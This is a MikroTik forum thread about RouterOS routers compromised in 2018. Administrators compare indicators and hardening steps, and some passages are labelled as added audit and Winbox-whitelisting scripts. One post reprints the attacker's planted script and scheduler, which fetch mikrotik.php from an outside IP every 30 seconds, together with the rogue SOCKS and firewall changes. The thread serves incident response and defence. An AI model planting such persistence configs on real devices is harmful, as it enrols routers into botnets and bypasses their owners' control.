
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Mikrotik.php file scripts

Thu Jul 26, 2018 10:44 am

Hi,

Normis, before you close this topic: I'm not interested in how they got in, but in what they want.
As seen in topic viewtopic.php?f=9&t=137217, over the past few days a vast number of non-up-to-date MikroTik devices have been compromised.
(Not blaming MikroTik; we should have updated.)

As Normis stated in the last post, the hacker could have collected passwords well beforehand and used them now.
We took action to remove scripts and schedulers and disable IP > Socks, then used firewall filters to block all incoming WAN traffic from non-whitelisted sources, and updated to 6.40.8.
I know that a clean Netinstall would be the best course of action, but we have devices spread over the whole of Europe, so that's easier said than done.

But I am wondering: what was the goal of this?
This is what I have found (not a hacking expert):
- A scheduler is used to run a script every 30 seconds.
- The script is used to fetch mikrotik.php from several IP addresses.
- There are different versions of the hack, or several steps; mostly I found script3_ under scripts, but I have also found script1_ on one occasion.
(Deleted it without proper examination... sorry, panic mode.)
- The source where mikrotik.php was downloaded from has gone, so there is no way to see what was in the mikrotik.php file.
- IP > Socks is set to enabled on port 4145.
[edit] - All drop rules in the firewall filters have been disabled.
That's all we found; has anybody got anything else that we have missed?

So if they already had the login credentials, then what did they do with mikrotik.php?
And did it infect the device on a shell level? (Does upgrading fix that, if that would be the case?)

Since taking the above steps, I have not noticed any strange behaviour, but it has only been 24h.
Did anybody get further in finding out what exactly has been changed in the devices?

Br,
Ammer
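An added audit script (mine, not from the thread or from MikroTik) that lists the indicators Ammer reports on a RouterOS v6 device: schedulers firing more often than once a minute, scripts whose source calls /tool fetch, IP > Socks enabled, disabled drop rules, and every full-rights user. It is read-only unless the `cleanup` switch is set; the one-minute threshold and that switch are my assumptions.

```routeros
# Added audit script, not from the thread. Read-only unless $cleanup is true.
# Reports the indicators Ammer lists so they can be reviewed before anything is removed.
:local cleanup false
:local findings 0

# 1. Schedulers that fire more often than once per minute (the thread saw interval=30s).
#    An interval of 0 means "run once", so it is excluded.
:foreach s in=[/system scheduler find] do={
    :local iv [/system scheduler get $s interval]
    :if ($iv > 00:00:00 && $iv < 00:01:00) do={
        :local ev [/system scheduler get $s on-event]
        :put ("[scheduler] " . [/system scheduler get $s name] . " interval=" . $iv . " on-event=" . $ev)
        :set findings ($findings + 1)
    }
}

# 2. Scripts whose source fetches something (the thread's script3_ pulled mikrotik.php).
:foreach s in=[/system script find where source~"tool fetch"] do={
    :put ("[script] " . [/system script get $s name] . " owner=" . [/system script get $s owner])
    :put ("         source: " . [/system script get $s source])
    :set findings ($findings + 1)
}

# 3. SOCKS proxy turned on (the thread saw it enabled on port 4145).
:if ([/ip socks get enabled] = true) do={
    :put ("[socks] enabled on port " . [/ip socks get port])
    :set findings ($findings + 1)
    :if ($cleanup) do={ /ip socks set enabled=no }
}

# 4. Drop rules that were switched off (Ammer found all drop rules disabled).
:foreach r in=[/ip firewall filter find where action=drop and disabled=yes] do={
    :local cm [/ip firewall filter get $r comment]
    :put ("[firewall] disabled drop rule in chain " . [/ip firewall filter get $r chain] . " comment=\"" . $cm . "\"")
    :set findings ($findings + 1)
    :if ($cleanup) do={ /ip firewall filter enable $r }
}

# 5. Every account in the "full" group, so an added user (the posted export shows owner=adminAC) stands out.
:foreach u in=[/user find where group=full] do={
    :put ("[user] full-rights account: " . [/user get $u name])
}

:put ("audit done, " . $findings . " finding(s); cleanup=" . $cleanup)
```

Scripts and schedulers are deliberately only listed, not removed, because the same pattern matches legitimate fetch jobs; review each hit before deleting it.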
 
genesispro
Member Candidate
Posts: 135
Joined: Fri Mar 14, 2014 12:33 pm

Re: Mikrotik.php file scripts

Thu Jul 26, 2018 2:23 pm

I used the following command in The Dude to fix the socks changes made:
[ros_command("/ip socks set enabled=no port=1080")]

I am also trying to enable all drop firewall rules using
[ros_command("/ip firewall filter enable [/ip firewall filter find where action=drop]")]
but it doesn't work.
Anyone know why?

If I run the command
/ip firewall filter enable [/ip firewall filter find where action=drop]
in the CLI, it works fine.

I used The Dude to apply it to all of the devices that I manage at once.
 
aramob
just joined
Posts: 1
Joined: Fri Jul 27, 2018 8:03 pm

Re: Mikrotik.php file scripts

Sat Jul 28, 2018 12:03 am

I got the same problem; yesterday I found connection attempts:
Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
And then this:
/system script
add name=script3_ owner=adminAC policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
o"
/system scheduler
add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup

Immediately, I changed all passwords and users, changed the Winbox port and added a whitelist for Winbox connections (my local network and my work's public IP).
Does anyone have an idea of what we could do in order to protect ourselves?

Greetings
 
berzins
just joined
Posts: 10
Joined: Thu Apr 05, 2018 2:46 pm

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 11:53 am

> I got the same problem; yesterday I found connection attempts:
> Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
> And then this:
> /system script
> add name=script3_ owner=adminAC policy=\
> ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
> ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
> o"
> /system scheduler
> add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
> ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
>
> Immediately, I changed all passwords and users, changed the Winbox port and added a whitelist for Winbox connections (my local network and my work's public IP).
> Does anyone have an idea of what we could do in order to protect ourselves?
>
> Greetings

It's a known exploit that was fixed months ago; all you have to do is what normis said:
1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 12:04 pm

The first topic is actually about something else, which is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:
The issue was fixed in March already.
https://blog.mikrotik.com

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
As to the original post, yes, it is a nice question. We currently don't have a full picture of how this thing operates. You are welcome to research and post your ideas and findings.
All we currently know is what method it used to get inside your device and how to protect the device.
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 12:24 pm

> The first topic is actually about something else, which is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:
> The issue was fixed in March already.
> https://blog.mikrotik.com
>
> 1. Upgrade to 6.42.3
> 2. Change password after upgrade (not before)
> 3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
> As to the original post, yes, it is a nice question. We currently don't have a full picture of how this thing operates. You are welcome to research and post your ideas and findings.
> All we currently know is what method it used to get inside your device and how to protect the device.

Hi Normis,

You can close the topic, as it doesn't seem to get replies that are actually on-topic.
(I feel for your support staff, seeing forum replies blatantly ignoring the update and password instructions while claiming new versions were hacked.)

As far as I can see, the hack was preparing the units for use in a botnet.
The mikrotik.php file was non-existent, but the fact that it was downloaded every 30 seconds suggests that whenever they wanted to attack they would post instructions in the mikrotik.php file and let the infected units execute them.
I think IP > Socks was opened in order to provide a backdoor in case the firewall rules were tightened. (If I'm correct, IP > Socks gives you a way to bypass the firewall??)

Anyway, we upgraded all our units to 6.40.8 and blocked all non-whitelisted traffic from WAN, and so far I have not seen any re-infected units. (User/password updates we will do next.)

Cheers.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 6:54 am

Hi everybody,
I thought the bug was closed in the 6.40.8 release,
but today more than 30 RouterOS devices were hacked, though on version 6.40.8 (bugfix only) and 6.42.6.
I saw this:
[image]
 
Jotne
Forum Guru
Posts: 1303
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 8:00 am

For some reason I do not see the picture, but I see the link, so I downloaded the picture.
Always upload pictures to the site: click the attachments button below.

[attachment: mikrotik-fuck-hacker.jpg]
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 8:21 am

> Hi everybody,
> I thought the bug was closed in the 6.40.8 release,
> but today more than 30 RouterOS devices were hacked, though on version 6.40.8 (bugfix only) and 6.42.6.
> I saw this:
> [image]

Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:00 am

>> Hi everybody,
>> I thought the bug was closed in the 6.40.8 release,
>> but today more than 30 RouterOS devices were hacked, though on version 6.40.8 (bugfix only) and 6.42.6.
>> I saw this:
>> [image]
>
> Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.

No, I'm sure about that.
This happened six hours ago.
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:03 am

How do you know that nobody connected a month ago also?
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:14 am

> How do you know that nobody connected a month ago also?

Because I upgraded the version a month ago, and I always follow the router and I know my RouterOS very well.
I have followed this bug since 6 months ago, and I know it, and I know the program can do this, but if I disable the www port the program can't get the password, and in 6.40.8 the bug is solved.

Today a lot of RouterOS devices got hacked; I think there is a new bug.
If I can talk to you by email I will give you some things.
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:19 am

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:38 am

> The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.

I hope so, but believe me, this happened after the upgrade.
Using a script or scheduler or fetch is primitive; I could use a much better trick than this to log in via Winbox after a password change or upgrade without the owner of the router noticing.
I have more than 200 RouterBoards, controlled via cloud.
I have a company, and my business depends on MikroTik RouterOS.
Please email me or Facebook:
it@max-upgrade.com
https://www.facebook.com/profile.php?id=100001210286834
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:13 am

> The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.

On some RouterBoards I found this trying to log in.
He can't hack it because my password contains Arabic characters.
With Arabic characters the password can't be obtained, except from an unencrypted backup file.
[image]
This photo is from yesterday.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:18 am

Then I disabled port 2000 from Tools > Btest Server,
and I disabled the socks,
and I exported a backup and read all the code; nothing bad.
I don't know if it will be hacked after that.
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:23 am

> Then I disabled port 2000 from Tools > Btest Server,
> and I disabled the socks,
> and I exported a backup and read all the code; nothing bad.
> I don't know if it will be hacked after that.

Hi ahmedalmi,

If you want to make your routers secure, make sure you set up your firewall to only allow access from known IP addresses or DNS records.
This way, even if they have the passwords, they just cannot log on to the device.
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:24 am

And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:32 am

>> Then I disabled port 2000 from Tools > Btest Server,
>> and I disabled the socks,
>> and I exported a backup and read all the code; nothing bad.
>> I don't know if it will be hacked after that.
>
> Hi ahmedalmi,
>
> If you want to make your routers secure, make sure you set up your firewall to only allow access from known IP addresses or DNS records.
> This way, even if they have the passwords, they just cannot log on to the device.

Hi sir,
I know that, but I haven't got a static IP at home, for example; I want to log in via cloud from anywhere.
Now I'm using an SSTP VPN to connect RouterOS with my laptop, and I allow access only from my IP address for the sstp-client,
but this is a little difficult with my customers.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:34 am

> And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.

Of course.
The default config is open.
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:35 am

No, default config has firewall on the internet port.
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:43 am

> No, default config has firewall on the internet port.

I mean the default config of the bandwidth-test port "2000" is open.
The firewall filter you are talking about has an exception for Winbox port 8291,
and the vulnerability exploits the Winbox port, you said that.
In the last photo the version is 6.40.9,
and it may solve the problem.
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:46 am

>>> Then I disabled port 2000 from Tools > Btest Server,
>>> and I disabled the socks,
>>> and I exported a backup and read all the code; nothing bad.
>>> I don't know if it will be hacked after that.
>>
>> Hi ahmedalmi,
>>
>> If you want to make your routers secure, make sure you set up your firewall to only allow access from known IP addresses or DNS records.
>> This way, even if they have the passwords, they just cannot log on to the device.
>
> Hi sir,
> I know that, but I haven't got a static IP at home, for example; I want to log in via cloud from anywhere.
> Now I'm using an SSTP VPN to connect RouterOS with my laptop, and I allow access only from my IP address for the sstp-client,
> but this is a little difficult with my customers.

Hi,
If you have a RouterOS device at home, just enable IP > Cloud and it will give you a DNS record you can use to whitelist your IP address.
We have an x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes,
and whitelists IP addresses that successfully connect an SSTP tunnel.
This way we can reach all our devices and only have 1 device that is reachable from the internet.

Another way is to limit Winbox access from the internet by allowing access only from certain IPs.
(@Normis, Winbox can only be limited by IP address, not by DNS... it would be a nice feature to be able to limit Winbox to DNS records, for people without static IP addresses.)
 
ahmedalmi
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:55 am

>>>> Then I disabled port 2000 from Tools > Btest Server,
>>>> and I disabled the socks,
>>>> and I exported a backup and read all the code; nothing bad.
>>>> I don't know if it will be hacked after that.
>>>
>>> Hi ahmedalmi,
>>>
>>> If you want to make your routers secure, make sure you set up your firewall to only allow access from known IP addresses or DNS records.
>>> This way, even if they have the passwords, they just cannot log on to the device.
>>
>> Hi sir,
>> I know that, but I haven't got a static IP at home, for example; I want to log in via cloud from anywhere.
>> Now I'm using an SSTP VPN to connect RouterOS with my laptop, and I allow access only from my IP address for the sstp-client,
>> but this is a little difficult with my customers.
>
> Hi,
> If you have a RouterOS device at home, just enable IP > Cloud and it will give you a DNS record you can use to whitelist your IP address.
> We have an x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes,
> and whitelists IP addresses that successfully connect an SSTP tunnel.
> This way we can reach all our devices and only have 1 device that is reachable from the internet.
>
> Another way is to limit Winbox access from the internet by allowing access only from certain IPs.
> (@Normis, Winbox can only be limited by IP address, not by DNS... it would be a nice feature to be able to limit Winbox to DNS records, for people without static IP addresses.)

You're right, but at home I haven't got RouterOS, and my customers want to log in via cloud from Android, sometimes using 3G or 4G.
It's a little difficult, like I said.

About Winbox only being limitable by IP address, not by DNS: you can use a scheduler to resolve the DNS name and set it on the Winbox service IP address.
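An added example (mine, not from the thread) of the approach ahmedalmi describes: a scheduled script resolves a dynamic-DNS name (such as the one IP > Cloud hands out) and writes the result into the Winbox service's allowed addresses, so the service itself refuses logins from anywhere else even if the password has leaked. The hostname, the LAN prefix, the 5-minute interval and the scheduler policies are placeholders/assumptions.

```routeros
# Added example, not from the thread. Save as /system script "winbox-ddns" and run it
# from a scheduler; the hostname and LAN prefix below are placeholders.
:local ddnsName "admin-home.example.com"
:local lanNet "192.168.88.0/24"

:do {
    # :resolve raises an error when the lookup fails, which lands us in on-error below.
    :local addr [:resolve $ddnsName]
    # Allow management from the LAN plus the single address the name currently points at.
    :local allowed ($lanNet . "," . $addr)
    /ip service set winbox address=$allowed
    :log info ("winbox-ddns: winbox now allowed from " . $allowed)
} on-error={
    # Fail closed: keep whatever restriction is already in place rather than widening it.
    :log warning ("winbox-ddns: could not resolve " . $ddnsName . ", address list unchanged")
}

# Install (run once from a terminal) after saving the lines above as the script "winbox-ddns".
# The policy set is my assumption of the minimum needed; widen it only if the log shows a
# permission error.
#   /system scheduler add name=winbox-ddns interval=5m start-time=startup \
#       on-event=winbox-ddns policy=read,write,test
```

This only tightens the service's own address list; the firewall filter on the WAN interface still has to drop everything not on the whitelist, as earlier posts recommend.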
 
wpeople
Member
Posts: 352
Joined: Sat May 26, 2007 6:36 pm

Re: Mikrotik.php file scripts

Mon Sep 03, 2018 11:38 pm

If you don't want to mess with VPN clients, then use port knocking.
There are (free) clients for almost any platform. Just send some packets in a specific order, and it will open up the ports FOR YOU for the time you specified.
 
normis
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Sep 04, 2018 2:46 pm

>> No, default config has firewall on the internet port.
>
> I mean the default config of the bandwidth-test port "2000" is open.
> The firewall filter you are talking about has an exception for Winbox port 8291,
> and the vulnerability exploits the Winbox port, you said that.
> In the last photo the version is 6.40.9,
> and it may solve the problem.

No, it is not open on the internet port. The default firewall blocks ALL incoming traffic from the internet; it also blocks bandwidth test.
 
ramiaburas2011
just joined
Posts: 1
Joined: Wed Sep 05, 2018 6:28 pm

Re: Mikrotik.php file scripts

Wed Sep 05, 2018 6:35 pm

> Hi everybody,
> I thought the bug was closed in the 6.40.8 release,
> but today more than 30 RouterOS devices were hacked, though on version 6.40.8 (bugfix only) and 6.42.6.
> I saw this:
> [image]

Ahmed,
I'm Rami Aburas from Ibb city.
This was found in my router:
script4_
and it is running in a scheduler.
